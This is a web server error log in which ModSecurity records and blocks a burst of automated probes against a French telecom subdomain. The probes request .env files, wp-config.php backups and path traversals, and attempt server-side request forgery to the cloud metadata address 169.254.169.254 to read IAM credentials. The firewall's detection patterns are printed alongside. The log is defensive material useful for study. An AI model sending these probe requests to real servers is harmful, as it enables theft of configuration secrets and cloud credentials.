[Mon May 11 15:23:23.233124 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:47162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYS6O9RdIr1DwxYR2TQAAAAMg"]
[Mon May 11 15:23:23.233328 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:47162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYS6O9RdIr1DwxYR2TQAAAAMg"]
[Mon May 11 15:23:23.234148 2026] [security2:error] [pid 1319953:tid 1319978] [client 195.178.110.133:47104] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYS-SQ-m-m0ukSShuCawAAAVc"]
[Mon May 11 15:23:23.234286 2026] [security2:error] [pid 1319953:tid 1319978] [client 195.178.110.133:47104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYS-SQ-m-m0ukSShuCawAAAVc"]
[Mon May 11 15:23:23.234469 2026] [security2:error] [pid 1319953:tid 1319978] [client 195.178.110.133:47104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYS-SQ-m-m0ukSShuCawAAAVc"]
[Mon May 11 15:23:23.235303 2026] [security2:error] [pid 1320398:tid 1320424] [client 195.178.110.133:47114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYS-JEyNRN152ArOSNZQAAAFg"]
[Mon May 11 15:23:23.235423 2026] [security2:error] [pid 1320398:tid 1320424] [client 195.178.110.133:47114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYS-JEyNRN152ArOSNZQAAAFg"]
[Mon May 11 15:23:23.235608 2026] [security2:error] [pid 1320398:tid 1320424] [client 195.178.110.133:47114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYS-JEyNRN152ArOSNZQAAAFg"]
[Mon May 11 15:23:23.238609 2026] [core:error] [pid 1319886:tid 1319919] [client 195.178.110.133:47138] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 15:23:23.239634 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYS1chVQ3tCn0m9OpZoQAAAQM"]
[Mon May 11 15:23:23.239761 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYS1chVQ3tCn0m9OpZoQAAAQM"]
[Mon May 11 15:23:23.239939 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYS1chVQ3tCn0m9OpZoQAAAQM"]
[Mon May 11 15:23:23.241056 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYS-JEyNRN152ArOSNZwAAAFM"]
[Mon May 11 15:23:23.241197 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYS-JEyNRN152ArOSNZwAAAFM"]
[Mon May 11 15:23:23.241391 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYS-JEyNRN152ArOSNZwAAAFM"]
[Mon May 11 15:23:23.242204 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS6t2WtvoFr7xvGzVUgAAAIQ"]
[Mon May 11 15:23:23.242266 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS6t2WtvoFr7xvGzVUgAAAIQ"]
[Mon May 11 15:23:23.242371 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS6t2WtvoFr7xvGzVUgAAAIQ"]
[Mon May 11 15:23:23.242556 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS6t2WtvoFr7xvGzVUgAAAIQ"]
[Mon May 11 15:23:23.246949 2026] [security2:error] [pid 1319885:tid 1319895] [client 195.178.110.133:3400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYRFchVQ3tCn0m9OpZQgAAAQY"]
[Mon May 11 15:23:23.248576 2026] [security2:error] [pid 1319953:tid 1319962] [client 195.178.110.133:47136] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYS-SQ-m-m0ukSShuCagAAAUc"]
[Mon May 11 15:23:23.248750 2026] [security2:error] [pid 1319953:tid 1319962] [client 195.178.110.133:47136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYS-SQ-m-m0ukSShuCagAAAUc"]
[Mon May 11 15:23:23.249942 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:47148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYS6O9RdIr1DwxYR2TQgAAAME"]
[Mon May 11 15:23:23.250066 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:47148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYS6O9RdIr1DwxYR2TQgAAAME"]
[Mon May 11 15:23:23.250278 2026] [security2:error] [pid 1320674:tid 1320691] [client 195.178.110.133:47148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYS6O9RdIr1DwxYR2TQgAAAME"]
[Mon May 11 15:23:23.253047 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:47162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYS6O9RdIr1DwxYR2TQwAAAMg"]
[Mon May 11 15:23:23.256348 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.257047 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:47162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYS6O9RdIr1DwxYR2TQwAAAMg"]
[Mon May 11 15:23:23.257286 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:47162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYS6O9RdIr1DwxYR2TQwAAAMg"]
[Mon May 11 15:23:23.257946 2026] [proxy_fcgi:error] [pid 1319886:tid 1319908] [client 195.178.110.133:47210] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:23.258039 2026] [proxy_fcgi:error] [pid 1320674:tid 1320694] [client 195.178.110.133:47186] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:23.260633 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYS-JEyNRN152ArOSNagAAAFM"]
[Mon May 11 15:23:23.261324 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYS-JEyNRN152ArOSNagAAAFM"]
[Mon May 11 15:23:23.261548 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYS-JEyNRN152ArOSNagAAAFM"]
[Mon May 11 15:23:23.278238 2026] [security2:error] [pid 1319953:tid 1319962] [client 195.178.110.133:47136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYS-SQ-m-m0ukSShuCagAAAUc"]
[Mon May 11 15:23:23.281893 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.292137 2026] [proxy_fcgi:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:23.307524 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.318055 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYS1chVQ3tCn0m9OpZpgAAAQM"]
[Mon May 11 15:23:23.318733 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYS1chVQ3tCn0m9OpZpgAAAQM"]
[Mon May 11 15:23:23.318934 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYS1chVQ3tCn0m9OpZpgAAAQM"]
[Mon May 11 15:23:23.323822 2026] [proxy_fcgi:error] [pid 1319953:tid 1319962] [client 195.178.110.133:47136] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:23.331468 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.339523 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYS1chVQ3tCn0m9OpZpwAAAQM"]
[Mon May 11 15:23:23.340257 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYS1chVQ3tCn0m9OpZpwAAAQM"]
